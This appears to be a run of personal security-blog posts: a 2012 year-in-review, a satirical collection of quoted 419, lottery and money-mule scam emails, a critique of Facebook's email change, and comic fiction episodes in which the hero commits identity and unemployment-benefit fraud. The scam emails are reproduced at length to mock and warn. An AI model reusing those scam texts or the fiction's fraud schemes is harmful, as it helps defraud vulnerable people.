August 2012 marked the fourth anniversary of Security For All. The very first blog post was all about the security theater accompanying the 2008 Democratic National Convention in Denver wherein then-Senator Barack Obama snagged the nomination ultimately culminating in his becoming now-President Barack Obama. So just to keep things symmetric and tidy [I've mentioned before I'm a "circle of life" kind of guy] I had to wait until after election day in November to make sure who was really going to win the Oval Office. Of course by then it was Thanksgiving time and I had to put together the annual Thanks for all the phishing extravaganza. That and I also had to make sure the world really didn’t end with the Mayan Calendar. So that’s my excuse for being 5 months late in getting this out.  And I’m sticking to it.

Regardless of the veracity of my excuses, I typically do a kind of “year in review” for the birthday post so year end 2012 is really more appropriate anyway. Yeah! That’s the ticket. So without further ado, in no particular order or coherency:

I made a big career change moving to Trustwave in January 2012, where I’m now working as a Software Architect. This is actually the real excuse for the lack-luster posting frequency on this web log. These Trustwave folks are brutal taskmasters that expect superhuman effort from me (and everyone else). And I love it.

My son Nick, who pens the Captain X-Ploit sagas, is now a Junior at CU studying Integrated Physiology (pre-med). This accounts for the good Captain’s MIA behavior.

The entertainment industry’s “war on piracy” [for the ironically impaired the reference is to the "war on drugs" or "war on terrorism" both abject failures at their stated intents but lucrative financially to the associated industries at the expense of everyone else] was ramped up by calling in some chips from their trained (purchased) politicians resulting in these adventures:

  • Stop Online Piracy Act (SOPA) spawned a “blackout” that became the largest protest in the history of the internet.
  • The US FBI shut down for alleged copyright infringement. This prompted the hacker group Anonymous (those guys with the swell Guy Fawkes masks) to respond by attacking government and entertainment industry websites. Turns out that Kim Dot Com, the Aussie proprietor of may actually end up suing the US government et al due to some sticky jurisdictional issues. In any case was soon replaced by other sites and any interruption in service was short lived. The “war on piracy” on this front is a lot more like “wack-a-mole” than a real war and every bit as effective.

Occupy London protesters were evicted from St Paul’s Cathedral. This of course begs the question of whether the Church of England is more concerned with spiritual or corporate interests. I’ll leave it as an exercise for the reader to come to their own conclusion.

2012 was a bad year for Greece. It started out OK with Greece securing a debt-restructuring deal with private lenders in March, but that turned out to be way too little, way too late and protests in Athens began (again) in earnest following a 77-year-old pensioner’s suicide outside Greece’s parliament in April. By mid April the Prime Minister of Greece, Lucas Papademos, had resigned and called an election for early May, but alas by mid May Greece’s fifth attempt to a form a coalition government went pear shaped and new June elections were scheduled. So once again Greek voters returned to the polls in early June. This time Antonis Samaras, the leader of the New Democracy party in Greece, was able to form a coalition government and by mid June Greece had proposed to slow down austerity measures by two years. This did not play well in Germany (i.e. the place where the Euro spigot valve is located). By September a new austerity measure was enacted that required Greece to increase its maximum working days to six per week. This did not play well in Greece where in late September Greek trade unions called a general strike to protest austerity measures and by mid October tens of thousands were protesting the austerity measures including 25,000 people in Athens protesting  German Chancellor Angela Merkel specifically. By mid November a series of protests against austerity measures occurred across Europe including Spain, Portugal, and of course Greece. Finally in late November the Eurozone announced that it would pay out 43.7 billion euros in loans to Greece. Call me cynical but I’m not predicting anything other than more protests in 2013 as a result.

Apparently spurred on by the quest for obscene wealth or maybe it was taking the money and running, Mark Zuckerberg decided to take Facebook public. In spite of working up unprecedented buzz surrounding the vaunted and highly anticipated [on Facebook at any rate] Initial Public Offering, the reality was that they had no idea how to pull off such a money grab (er.. IPO). The result was that Facebook’s problematic public listing ended up costing those involved $115 million from technical glitches. The stock turned out to be a bit of an underachiever (read LOSER).

In other legal follies Apple sued Samsung and Samsung sued Apple in a multi-part saga spanning the globe. In late August both Apple and Samsung were found guilty of patent infringement in a South Korean court while a US jury in California found Samsung guilty of patent infringement and awarded over US$1 billion in damages to Apple and Apple lost its patent dispute with Samsung in Tokyo, Japan. But wait! There’s more! [in my best late night infomercial voice]. By mid October a US appeal court overturned a district court ruling banning the sale of Samsung in the US. So let’s see  by my count the score is now Apple – 0, Samsung – 0 in South Korea, Apple – 1/2, Samsung – 0 in the US, Apple – 0, Samsung – 1 in Japan. So that’s Apple 1/2 to Samsung 1 overall. That seems like a lot of legal money for nothing. I’m just saying…

On a more serious note, 12 people were killed and 59 injured after a gunman opened fire at a movie premier in Aurora, Colorado and a few months later 28 people, including 20 children, were shot to death at Sandy Hook Elementary School in Newtown, Connecticut. The saddest part of these tragedies was the predictable reactions of zealots on both sides of the “gun issue”. National Rifle Association (NRA) members went on a buying spree of assault weapons and ammunition fearing that restrictive new laws would be enacted making it marginally more difficult for them to maintain and expand their arsenals. While on the other side politicians beat their breasts, claimed to feel our pain, and vaguely promised exactly the kind of useless legislation that the gun rights adherents so pathologically detest. The NRA actually proposed training and arming all public school principals, and the great state of Arizona dutifully passed dubious legislation along those lines. Primary school principals with assault rifles – What could possible go wrong with that? My disgust with political discourse in America grows.

And then there was Hurricane Sandy which became Super Storm Sandy. Here are the bare facts:

October 24 - Hurricane Sandy makes landfall in Jamaica killing 1 person and causing over $50 million in damage
October 25 - Hurricane Sandy makes landfall in Cuba and Haiti killing 65 people and causing over $80 million in damage
October 26 - Hurricane Sandy makes landfall in the Bahamas killing 2 people and causing over $300 million in damage
October 29 - Hurricane Sandy makes landfall in New Jersey resulting in 110 deaths and $50 billion in damage and forces the New York stock exchange to close
October 31 - The New York stock exchange opens after being closed for two days after Hurricane Sandy
November 26 - The cost of Hurricane Sandy to New York is announced to be $32 Billion

The actual story beyond the devastating facts above is that the Jersey shore as we remember it is gone. Forever. All over New York and New Jersey the devastation was unprecedented [my daughter-in-law's uncle's house in Long Island was all over the news because the house across the street literally blew up when a tree uprooted a gas line - the demolished house is in the foreground of the picture]. The lessons here are several:

  1. Our emergency preparedness systems are not ready for a disaster of this scope.
  2. Climate change is happening. Now. We need to quit pretending and start preparing to be resilient.

So stay tuned. Maybe we’ll be a bit more responsible about blogging at Security For All. Or not. But it will probably be pretty funny and borderline informational.

Oh and be sure to actually go to the Security For All blog site and check out our annual swell theme change.

Thanks for all the phishing in 2012
Thanks for the information
Oh never give a sucker an even break
When you’re on to something it’s a
Dime in a dozen people start
Coming out of the woodwork
Thanks for the invitation
I know I must be on to something big
From Thanks for the information by Van Morrison

In 2009, the first year of this blog, in honor of Thanksgiving here in the USA I posted an entry about some things I would have been thankful for in 2009. If they were even remotely true. I’m a collector and, dare I say connoisseur, of Nigerian 419 style phishing messages. Since then it’s become an annual event. So without further ado, here is a sampling of my favorites from 2012. The things I’m thankful for.

I am thankful for Someone associated with the Benin Republic who wants to give me $950K (I think) in $5K (or is it $4K) chunks and it will only cost me $50.



RECEIVER NAME:okoye Lawrence



I’m pretty sure I understand that…
OK seriously that pegs the old WTF meter, but hey it’s got to be legit since Mr. Pius is THE NEW MANAGER OF WESTERN UNION. And how can you possibly not trust that security question and answer. This is the hands down winner of the Most Egregious Misuse of Google Translate award in the Found Money category.

I am thankful for all of the US and international government organizations who are dedicated getting my money back from those nasty Nigerian Miscreants, Hoodlums and Touts.

Office Of The National Security Adviser
Federal Republic Of Nigeria
Aso Rock Villa, Asokoro District,

Based on our investigations,we wish to warn you against some Miscreants, Hoodlums and Touts who go about scamming innocent people by claiming to be who they are not and thereby tarnishing the image of this wonderful country. I am Lt General Peter Olu (Rtd),National Security Adviser to the new Nigerian President Dr Goodluck Ebele Jonathan,(GCON).

I am delighted to inform you that the contract panel which just concluded its seating in Abuja, just released your name among listed beneficiaries to benefit from the Diplomatic Immunity Payment. This Panel was primarily delegated to investigate manipulated inheritance claims, contracts and over-invoiced payment as the effect has eaten deep into the economy of our dear country.

However,we wish to bring to your notice that your contract profile is still reflecting in our central computer as unpaid beneficiary while auditing was going on. Your payment file was forwarded to my office by the auditors as unclaimed fund, we wish to use this medium to inform you that for the time being,the Federal Government of Nigeria have stopped further payment through bank to bank transfer due to beneficiaries numerous petitions to United Nations against Nigeria on wrong payment and diversion of contract/inheritance funds to different accounts.

In this regards, we are going to send your contract part payment of $4.1 Million USD to you via our accredited shipping company and I have secured every needed documents to cover the money while the diplomat will get it delivered to you right in your door step.

Note: The money is coming in 2 security proof boxes. The boxes are sealed with synthetic nylon seal and padded with machine. Please you don’t have to worry for anything as the transaction is 100% risk free.

Best Regards,

Lt General Peter Olu (Rtd).
National Security Adviser to the President
Federal Republic of Nigeria.

And this helpful organization as well.

Good day,
I am Dr. Sofia Hill, I am a US citizen, 48 years Old.  I am one of those that took part in the Compensation in Nigeria many years ago and they refused to pay me, I had paid over $20,000 while in the US, trying to get my payment all to no avail. So I decided to travel over to Nigeria with all my compensation documents, and I was directed to meet Mr. Michael Craig, who is a member of COMPENSATION AWARD COMMITTEE, and I contacted him and he explained everything to me. He said whoever is contacting us through emails are fake. He took me to the paying bank for the claim of my Compensation payment.

Right now  I have received my compensation funds of $1,500,000.00 Moreover, Mr. Michael Craig, showed me the full information of those that are yet to receive their payments and I saw your name as one of the beneficiaries, and your email address, that is why I decided to email you to stop dealing with those people, they are not with your fund, they are only making money out of you.

I will advise you to contact Mr. Michael Craig directly through the below information.

Name: Mr. Michael Craig
E-mail: michaelcraig44@…

You really have to stop dealing with those people that are contacting you and telling you that your fund is with them, it is not in anyway with them, they are only taking advantage of you and they will dry you up until you have nothing. The only money I paid after I met Mr. Michael Craig was just $420 for the paper works, take note of that.

Thank You and Be Blessed.

Dr. Sofia Hill, MD
Childrens Hospital Outpatnt Ctr

Wow! All of these folks falling all over themselves just to help me get satisfaction from those scammers. Although I can’t actually recall being scammed, it was hard to choose which of these individuals was the most trustworthy – Lt General Peter Olu (Rtd). he’s ex-military, and National Security Adviser to the President (of Nigeria) or Mr. Michael Craig who comes highly recommended by Dr. Sofia Hill, MD who was scammed out of $20,000. You can choose which should win in the Help from Nigeria category.

I am thankful for all of the wonderful folks who recognize what an honest, astute investment adviser I am and want to make me rich for assisting them in philanthropic endeavors.

Beloved, Please read this letter carefully.
Don’t be surprise to receive this message; I got your email address from a mail directory. I am Mrs. Joy Armstrong a National of Ivory Coast; I am married to Late Engr. Daniel Armstrong. We were married for 17 years without a child but still waiting upon the lord before my beloved husband`s death in the year 2006.

Since after the death of my late husband, I decided not to re-marry. When my lovely husband was alive, he deposited the sum of US$8 Million (Eight Million United States Dollars) in fixed /suspense account in one of the leading Bank here in Ivory Coast. Presently the bank management contacted me as the next beneficiary because, the initial agreement which my late husband reached with the bank for withdrawal of the fund has expired and due to my critical health am not opportune to apply for the release of the fund to me because, I have a deadly disease called CANCER OF THE LUNGS.

Recently my doctor said my conditions is really deteriorating and is quite obvious that my death is very close because, the CANCER stage is becoming worst. I have been hospitalized for the past 7 months. Base on doctor`s report, am scared because death can come at anytime I now decided to share my feelings and plans with you at this moment in good faith to donate this inherited funds through your great influence and assistant by utilize 70% of the total money to the following like Churches, Orphanages Home, Handicaps, Widows and Widowers, while you keep the remaining 30% for yourself for carrying out my last decision.

Kindly reply me if you can do my wish so I can give you more details on how best the fund will be transfer to you. and will also issue you a letter of authority declaring you as the next of kin or beneficiary to the fund. Please kindly assure me that you will act accordingly and keep all details confidential.

I expect your prompt reply. Thanks and God bless you.

Yours faithfully

Mrs. Joy Armstrong.

And this person who entices me with coy romantic innuendos.

My Dearest,

Good day to you, I know you will be surprise to receive this email, Before I proceed I must first apologize for this unsolicited mail to you, I am aware that this is certainly not a conventional way of approach to establish a relationship of trust, my dear I will like you to understand that, I am writing this mail to you With due respect trust and humanity, I have decided to contact you after much thought considering the fact that we have not meet before, but because of the circumstance oblige me, I decided to contact you due to the urgency of my present situation here in the refugee camp, honestly i am writing this email to you with pains, tears and sorrow from my heart, I am Miss Alice Kipkalya Kones, 25yrs old female and I from Kenya here in Africa; my father was the former Kenyan road Minister. He and Assistant Minister of Home Affairs Lorna Laboso had been on board the Cessna 210, which was headed to Kericho and crashed in a remote area called Kajong’a, in western Kenya. The plane crashed on Tuesday 10th, June, 2008.

After the death of my beloved father my wicked step mother along with my uncles team together and sold everything that my late father had and share the money within themselves. Unfortunately to me I fined my father’s briefcase and when I opened it I found a document, which my late father use to deposit the sum of Nine Million Four Hundred Thousand United State Dollars ($9.400.000.00) in a Bank, here in Burkina Faso West Africa with my name as next of skin, right now I am in Ouagadougou Capital of Burkina Faso to withdraw the money so that i can start a better life and also further my education.

But on my arrival to the Bank, the Bank foreign Operation Department Director whom I meet in person told me that my father instruction to their bank is that the fund would only be release to me when I am married or present a trustee/partner who will help me and invest the fund overseas after the transfer, and the bank ask me to go and look for a foreign partner, that was why I decided to contact you, which I believe that you are going to be honest and reliable person that will help me and stand as my trustee/partner, so that I can present you to the Bank for the release and transfer of the inheritance fund into your bank account in your country, and It is my intention to compensate you with 40% of the total fund for your services and help and the balance shall be my capital in your establishment. As soon as I receive your positive response showing your interest i will put things into action, in the light of the above, I shall appreciate an urgent message indicating your ability and willingness to handle this transaction, awaiting your urgent and positive response, Please do keep this only to your self, i beg you not to disclose it to any body till i come over because am afraid of my wicked stepmother, i will send you my picture in my next email, with due respect, i am pleading that you help me, i am giving all this detailed information with every transparency believing that you will have a clear picture of the base of help i need from you.

I hope to hear from you soon, May truth and love be the guiding word in my refuge,

Best regard,

Yours Sincerely
Alice Kipkalya Kones.

Yet another hard choice to make – do I go for the widow who’s dying of a deadly disease called CANCER OF THE LUNGS but is only offering me 30% of $8 million or the damsel in distress (I’m a sucker for sob stories that involve wicked stepmothers) who implies that I could get not only romance but control of $9.4 million. Again you can choose which should win in the Help with Investments category.

I am thankful for long lost relatives who leave me obscene amounts of money.

Dear Friend,

I am Joseph Onalia, an Attorney by profession from Republic of Togo, Senior Advocate of Togo, (S.A.T).

It might interest you to know that I have a deceased client that bears the same surname with you.

Mr A I.(your last name) came to Togo in 1988 and was working with Shell Development company, Lome Togo.

In 1996 Before his death, I assisted him in making a 15years fixed deposit worth $9.5M which has now Matured to USD$21M payment by the financial institution.

The bank has notified me to provide the next of kin or have the account Confiscated within the next 60 official working days.

I am contacting you for two reasons. Firstly, you both have the same last name, which makes the claim most credible. Secondly, I strongly believe that the financial firm does not deserve to inherit the funds.With your permission, I wish to  proceed to establish you as the next of kin/Beneficiary to my late client.

Do not be afraid as I am his representative attorney and stand the capability to provide all the necessary paperwork to back up this claim until the funds are released to you, We will split.

As it is currently valued at US$21M USD. I intend to split the total US$21M USD with you equaly 50%/50%, after deducting any expenses that comes up during the process of this transaction and thereafter i shall invest my own share in real estate business in your country. Let’s work this out for I have all the documents to prove you as the heir to my deceased client.  If this is against your principles, I do humbly apologize and please do keep very secret.

Kindly get back to me with your;

Full name…………………
Telephone number……………….

I look forward to hearing from you if you are ready to proceed on this transaction.

Best regards,

Barrister  Joseph Onalia
Senior Advocate of Togo, (S.A.T).

Ah yes, good old uncle A I.(your last name), I remember him well before he left for Togo… But that lawyer Joseph Onalia seems a little sleazy – even if he is Senior Advocate of Togo, (S.A.T). I mean taking 50% of my $21 million – after deducting his expenses – seems harsh. I’m not really sure why he needs to know my profession but he’s definitely the winner in the Inheritance category.

I am thankful for uncouth oil companies who want me to assist with business investments.





Although I’m usually wary of crude organizations like Fox Media, this offer is so obtuse that how can it not be legit. This is the clear winner of the Most Egregious Misuse of Google Translate award in the Shady Deals category.

I am thankful for the outrageous prizes I’ve won in various contests I’ve never even entered including WRM Media, Asia Pacific Lottery, YAHOO & WINDOWS LIVE prize, BP Biannual Webmail Sweepstakes, UK National Online Lotto and Yahoo Awards promotion.

Hello Joseph Webster,


Your eMail address was exclusively selected as a possible winner.

Well done – you made it!

You have qualified for the free-choice sweepstake and are therefore amongst the chosen few in the final draw for 3 Apple products: iMac, iPhone, iPad.


Asia Pacific Lottery Organization
80b Phetchamnork Avenue,
Bangkok Thailand.


We write to Congratulate you as regards your Email Address success in our Online Computer Balloting Sweepstakes Program from the Asia Pacific Lottery Organization online draws of 5th Day of the Month held in Bangkok Thailand.

All participants were selected through the Registered Computer Internet Users ballot system drawn from 10,000, Personal Email Addresses & official Email Addresses, from Asia, Australia, New Zealand, Europe, North and South America, Middle East and Africa, as part of our International Promotions Program.

Your Email Address has subsequently won you one of the two Jackpot prizes in the 5th category? You have therefore been approved to claim a Total Sum of USD$368,000.00 (THREE HUNDRED AND SIXTY EIGHT THOUSAND UNITED STATES DOLLARS) Only.

Your Email Address attached to ticket number APLA286067-00-805 with Serial Number ANGR9-3088 that drew the Lucky Numbers of 8641146.

You have therefore been approved of a lump sum payment of USD$368,000.00 (THREE HUNDRED AND SIXTY EIGHT THOUSAND UNITED STATES DOLLARS) Only in cash credited REF NO: ASIAPLOTTOORG00-03803.


British Microsoft Award
Headquarters: Customer service

33 YatchBasinMarina Offices,
UponTyne Newcastle London.


Your email addresses have just won YAHOO & WINDOWS LIVE prize money of GBP£2,000,000.00 (TWO MILLION = GREAT BRITISH POUNDS STERLING) On Friday, 8/3/ 2012. Award winners emerge through random selection of all active email subscribers online. Six are selected monthly to benefit from this promotion.

Payment of Prize and Claim

Winners are to be paid in accordance with his/her SettlementCenter. This promotion was drawn based on email address as the key identification for setting up online accounts. All valid email addresses in the World Wide Web Draw used/participants for the online email promotion version were selected randomly via computer balloting from a global website collaboration with internet companies like eBay, pay pal, liberty reserve, and Google whom also built their systems and based their membership registration identity on email addresses supporting this computer draw system done by extracted email addresses from over 100,000 unions, associations, and corporate bodies  and  affiliated members to the National Lottery website and their advertisers listed online.

these are your identification numbers:
Batch Number: YPB/08/APA-43658
Reference Number:  ZA/YPN/270992008
Award File Security code:  UK/+QU03005

Please note that you’re lucky winning ticket file and number falls within our African booklet representative office in Johannesburg South Africa, as indicated in your ballot played coupon. In view of this, your (£2,000,000.00) would be released to you by our payment department in South Africa


Reference Number: BP12/0117/2012
Batch Number: PBSS102/1414
Dear Sir/Madam,

Winning Notification

The BP Promotions Office hereby notifies you that you are a winner of our Biannual Webmail Sweepstakes Program which took place on the 21st of March 2012 in our head office.

Participants were obtained from a database of one billion email user accounts and no tickets were sold because email addresses were assigned play coupons which were randomly generated using our Quick-Pick Automated E-ballot Software.

You have therefore been approved for the lump sum pay out of £750,000.00(Seven Hundred and Fifty Thousand Pounds Sterling) allocated to Ref No: BP12/0117/2012 because your play coupon bears one of the lucky winning number sequences [21-24-32-43-36-45] Bonus (16). This is from the total promotional budget of £16,000,000.00 (Sixteen Million Pounds Sterling) which is to be shared amongst the winners in this category



Are you the correct owner of this email address? If yes then be Glad this day as the result of the UK National Online Lotto and e-mail address free-ticket draws of The 2012Promotion Award has just been released and we are glad to announce to you that your email address came out in the first category and entitles you to claim the sum of ₤1,850,000.00 {One Million Eight Hundred and fifty Thousand British Pounds, From the UK National ONLINE Lottery Promotion

Your email address was entered for the online draw on this free ticket number: 9DHHDF09373 and won on this Lucky number: UKLO647UZGDJ2.

Please remember you did not enter or buy the ticket to earn you this Prize. It is a Promotional Program to encourage the use of Microsoft and Internet Programs.


Yahoo Awards Center
124 Stockport Road,
Longsight, Manchester M60 2DB – United Kingdom

Dear winner,

This is to inform you that you have won a prize money of Eight Hundred,Twenty Thousand Great Britain Pounds (£820,000,00.)for the month of May, 2012 Prize promotion which is organized by YAHOO AWARDS & WINDOWS LIVE.

YAHOO collects all the email addresses of the people that are active online, among the millions that subscribed to Yahoo and Hotmail and few from other e-mail providers. Six people are selected monthly to benefit from this promotion and you are one of the Selected Winners.

Yep – it’s been a great year for my lottery-winner-without-playing career. Aside from the millions of GREAT BRITISH POUNDS STERLING (apparently that’s the currency of choice for these lotteries – and whats up with all that collaboration between Microsoft and Yahoo?) I also won some swell Apple products and was even chosen to be on Deal or No Deal. Of course I’m still waiting for my money, iStuff and for Howie to call but in the meantime these all were winners in the Lottery Winnings category.

I am thankful for all of the offers of thinly veiled money laundering gigs.

Good day.

International Financial company working in the field of medical payments has available vacancy of Account Coordinator in USA.

The main responsibility of this position is to serve payments from our clients in United States.

Requirements :

- Location : USA

- Adult age

- Proven ability to work as part of a team


- Ability to work as home-based employee

- Flexible working schedule

No entrance fees are required.

If you are interested, please send back your resume (CV) with your contact details.

Have a good day.

Strictly speaking these aren’t really phishing attacks. They are real, if not legitimate, job offers. They are, however, related to these phishing scams in that this is how the money is laundered – through bogus financial, travel or shipping companies where all of the Account Coordinators work from home and basically run money through their checking accounts. These solicitations range in veracity from obvious nonsense like this one to really good fake CareerBuilder and Monster notifications. The Money Laundering category contains by far the most messages that I receive.

So there you have it – my list of stuff that I would be thankful for if they were even marginally real.

On a final, more sobering note I received one phishing email that has the dubious honor of being the most chilling and disgusting message I’ve ever received. The background for what makes this message so nasty is this, as described by The Denver Post:

The 10-year-old girl with the gap in her front teeth, who liked to play cheerleader and waitress, giggled a lot, loved the color purple and couldn’t wait to be a teenager, was on her way to school, alone.

She was supposed to meet a friend, a boy her age. The 1,000-foot walk down the street to his home should have taken four minutes, maybe five.

But Jessica Ridgeway, bundled against the cold in a black puffy jacket, never arrived.

The hours and days that followed brought confusion and false leads, moments of hope and dread, leading to the devastating announcement a week after her disappearance that human remains found in a desolate open-space park 9 miles from her home were Jessica’s.

On the afternoon of Oct. 10, maintenance workers were out picking up trash — a routine exercise in a park neighboring a landfill.

Earlier that day, police announced they had ruled out Jessica’s parents as suspects and believed an unknown person abducted her.

At about 2 p.m., workers came across a plastic garbage bag in plain view near a culvert on the side of the road, said Arvada police spokeswoman Jill McGranahan. The bag was heavy and “seemed kind of strange,” she said.

At that moment, animal-management officers who typically chase down stray dogs and escaped livestock drove by.

The maintenance workers flagged them down. An animal-control officer looked inside the bag and saw human remains, McGranahan said. Law enforcement officials have declined to be any more specific than to say they discovered a body that was “not intact.”

Within hours, hundreds of local police and FBI agents descended on the open space to walk the area and look for evidence.

It was 9 miles from Jessica Ridgeway’s house.

Two days later, grim-faced state and local law enforcement officials announced that DNA tests had confirmed that the remains were Jessica’s.

“The focus has changed from the search for Jessica to a mission of justice for Jessica,” said Westminster Police Chief Lee Birk.

“There is a predator at large in our community.”

So against that backdrop – I live about 2 miles from where Jessica was abducted – I receive this email purporting to be from “Neighborhood.Alert” with a subject of “Child Predator Warning”. The email contained only images that linked to some sites where you could “sign up for more information”. Yeah you bet – straight up phishing ploy. Let me close with this friendly warning to the person or group behind that little scam: I will hunt you down and you won’t like it when I find you.

Why are you still at Facebook?

why do you affect me? why do you affect me still?
why do you hinder me? why do you hinder me still?
why do you unnerve? why do you unnerve me still?
why do you trigger me? why do you trigger me still?
From Can’t Not by Alanis Morissette

This week was the occasion for yet another Facebook attack on their users sufficiently egregious to stir me out of my summer hiatus. Or was that my extended spring hiatus? Regardless of my obvious neglect of this weblog, I just couldn’t let this one pass. Basically the facts, as reported by Graham Cluley at the nakedsecurity blog, are these.

Back in April, Facebook quietly announced that it would be giving users email addresses so that they matched their public username (used as the URL for users’ profile pages).

However, the social network didn’t make clear that it would also be making the email addresses the default address displayed to your online friends.

Clearly this all part of the site’s plan to get more people using the email addresses, thus making the social network even harder to extricate yourself from.

As we described extensively in our examination of the Facebook messaging system, the email addresses are likely to prove attractive targets for spammers hawking goods and malicious links.

Facebook will have to implement effective filtering mechanisms to prevent fraudsters from exploiting users with spam, scams and phishing attacks as a result of this opening up of the network’s messaging system.

My guess is that it won’t be long at all before we see criminals abusing email addresses for their own nefarious reasons.

Well that was just the beginning of this debacle. Turns out we didn’t have to wait for criminals to start abusing those dandy new (and mostly unwanted) email addresses because Facebook’s unbridled lust for every scrap of personal information they could steal from their users caused a really nasty side effect. The facts surrounding this (presumably) unintended consequence, as reported by Help Net Security, are these.

If you thought that Facebook’s recent unannounced change of its users’ email address tied with their account to Facebook ones was bad, you’ll be livid if you check your mobile phone contacts and discover that the change has deleted the email addresses of many of your friends and acquaintances.

According to Facebook, the glitch was due to a bug in its application-programming interface, and makes the last added email address be pulled and added to the user’s phone Contacts.

The company says they are working hard at fixing the problem, but in the meantime, a lot of users have effectively lost some of the information stored on their devices.

And Violet Blue over at CNet News wrote this.

An alarming number of people are reporting that the new e-mail address Facebook forced on users this week is changing their address books while intercepting and losing unknown amounts of e-mail.

Facebook users say contacts’ e-mail addresses on phones and personal devices have been altered without their consent — and their e-mail communication is being redirected elsewhere, and lost.

One very angry user is Adobe employee Rachel Luxemburg.

On her personal blog she writes,

 Today, a co-worker discovered that his contact info for me had been silently updated to overwrite my work e-mail address with my Facebook e-mail address. He discovered this only after sending work e-mails to the wrong address.

And even worse, the e-mails are not actually in my Facebook messages. I checked.

They’ve vanished into the ether.

For all I know, I could be missing a lot more e-mails from friends, colleagues, or family members, and never even know it.
As Luxemburg explains, this disaster is happening despite the fact that, like many others, she rushed to replace the @Facebook e-mail with their correct e-mail address once they’d found out about Facebook’s change.

When Facebook forced its hundreds of millions of users into an @facebook account, commenters across the Internet talked about alterations that had begun in their contacts and address books outside Facebook — valid e-mail addresses were being changed for @Facebook without people’s awareness or consent on their phones and computers.

So if I’m a lawyer (which I’m not, but let’s pretend) right about now I’m thinking Class Action Lawsuit, Booyah! If I’m a corporate IT guy (which I’m not – but I know quite a few of them) right now I’m thinking Holy BYOD [Bring Your Own Device] Batman! I think I’ll re-route the help-desk to those frickin’ brain donors at Facebook! And if I’m a security guy and recovering Facebookie (which I am), right about now I’m thinking Why in the name of all that is sacred is anyone putting up with this crap?

Seriously folks, things were bad enough at Facebook when I dumped them last year and wrote about it, and I’ve been kept busy by the rascals since then with this piece about Facebook’s way-too-cozy relationship with law enforcement and this post about a micro-lending start-up using Facebook “friends” as credit references. Look, I get it – Facebook gives you the illusion of being connected with long lost friends and family. And that’s not altogether terrible. But don’t kid yourself, it’s still an illusion and if you really cared to “be connected” with those people you would call them or send personal emails to them. For goodness sake, think about what you are giving up to have this virtual (read phony) social life: not only your personal information but now your personal correspondence too. What’s next? A webcam feed to Facebook from your bedroom? Or better yet, try explaining to your boss how you missed that big order because it went to your account which you didn’t even know you had. But Facebook did and I’ll bet they’ll be happy to sell it back to you.

Captain X-Ploit: Another Crack in the Wall

The Adventures of Captain X-Ploit:
Another Crack in the Wall
– Part 4.5 of the epic chronicle –
Captain X-Ploit vs. The Bills

            As the heads of zombies rolled and his teammates droned about changing clips and needing med kits, David’s mind wandered. He began to contemplate zombies… and then it just clicked.

David’s character stood still for nearly three minutes and it took his teammates yelling, having lost their sniper support, to bring him back to reality. He hit the chat key responded “I have to go now,” and threw his headset off as he powered down the game and logged online to do a quick confirmatory search.

He didn’t really know what he was onto; he had the first step of a vague plan forming. He could see the beginning but no end. Still something compelled him to throw himself forward into this plan with full force. He reached for his phone and dialed the number on his computer screen.

“Hi, you’ve reached Trustonia Valley Hospital records office how can I help you today?”

“Hi, yes I appear to have been falsely reported as dead.” David responded.

“Oh, dear that is bad! What is your name?”

David scanned the obituary page until he found a suitable sounding name, “I’m Curtis Trent, I desperately need that corrected in all my files as well as a change of address”

“Of course sir, that will just be a minute what address would you like to change it to?”

“1302 Deven Ave, Trustonia. Oh and I have recently changed my name to David Nicholas Stone, if you could update that for me too.”

“Sure thing sir, just give me a few minutes to make those changes.”

About five minutes later David hung up the phone after giving himself a rather ghostly roommate. He then dialed a different hospital and repeated this activity. Continuing in this vein he gave himself over 100 new ghostly roommates, maximizing his time by submitting requests in emails while waiting on the phone.

He then spent the next several hours submitting online requests for unemployment benefits for his new friends who happened to live at the same address as him with the same name.

The day drew to a close and he found himself one step closer to not only paying off his bills but to completing the ultimate exploit. All he had to do was wait for those checks to roll in.

Short but sweet this time and clearly to-be-continued. Our hero continues with his recent penchant for identity theft variants, this time appropriating the identities of folks who are beyond caring what happens to their good name. Now clearly this gambit is only going to work for a short time since even the Trustonia Department of Unemployment, who we assume to be even more inept that the typical real world division of employment, will certainly twig to paying benefits to the deceased with no prior graft arrangement in place. It will be interesting to see what the good Captain has planned with the ill-gotten government benefits of his undead namesakes. Stay Tuned.

Captain X-Ploit: Matlock rocks my socks off

The Adventures of Captain X-Ploit:
Matlock rocks my socks off.
– Part 5 of the epic chronicle –
Captain X-Ploit vs. The Bills

A bank is a place that will lend you money if you can prove that you don’t need it. ~ Bob Hope


Since this Captain X-Ploit episode is a continuation of the original saga, and since it’s been a really, really long time since the good Captain has deigned to make an appearance, the following are links to the original episodes so we can all get caught up with the story thus far.

David went back to his home. It was a rather pleasant house in a nice neighborhood. Its generic white walls gave no indication that an evil genius might live inside. That was exactly how David liked it and exactly why he had bought it.

As he parked his new prize in the garage he could hear the excited clicking of Nicky’s nails on the tile as she doubtlessly was rushing to see why the garage door was opening. As he walked in he knelt down to pet her affectionately and passed her an oatmeal raisin bagel.

She barked appreciatively and then began to wolf it down. “Oh Nicky, you’re the best roommate a guy could ask for.” That thought gave him pause for a moment. “Roommate,” he re-uttered the word. Perhaps that is the key for today’s adventure he thought. Leaving Nicky to enjoy her bagel, he hastily ran upstairs to hop online and do some research while enjoying his bagel and coffee.

After about ten minutes of useful research and about three hours of watching internet videos, he picked up his phone and called the bank.

“Hello, you’ve reached ‘Stage Coach Banking’, my name is Jenny. How can I help you today?”

“Hello Jenny, My name is David Nicholas Stone and I regret to inform you that I will not be paying my mortgage payment this month.”

“Hmmm… It says here that you have never made a payment and I need to send the police to evict you.”

“Ah, yes, I figured as much. But see, the problem is that I have suffered a bout of extreme aging and I am now over the age of 65 and therefore am exempt from eviction.”

“Oh, goodness! Are you OK, sir?”

Quite. In fact, the senior discounts are very handy and I find myself truly enjoying Matlock for the first time in well… ever I guess.”

“That’s a relief! But you do realize we will require at least a doctor’s note confirming your age, Mr. Stone”

David smiled and joyfully rolled his chair over to the file cabinet next to his desk and fingered through it until his hands landed on the file he was looking for. It was labeled “Nicky’s vet records.” He pulled out the latest checkup. Among the general stats at the top was written “age: 13” and “age in dog years: 65”.

“I have the file here from my medical care provider clearly stating that by a unit of measure I am to be considered 65 years of age.”

“Excellent. If you will just scan and email that file to us we will be forced to leave you be until you die.” Jenny said cheerfully.

“Sure thing. Oh, one last detail. Under age it says “13” that is in reference to the age of my new hip, not my actual age. My actual age is labeled “dog years” but in fact that is a typo, they meant to put “God years,” as in how long it has been since God created my magnificent body.”

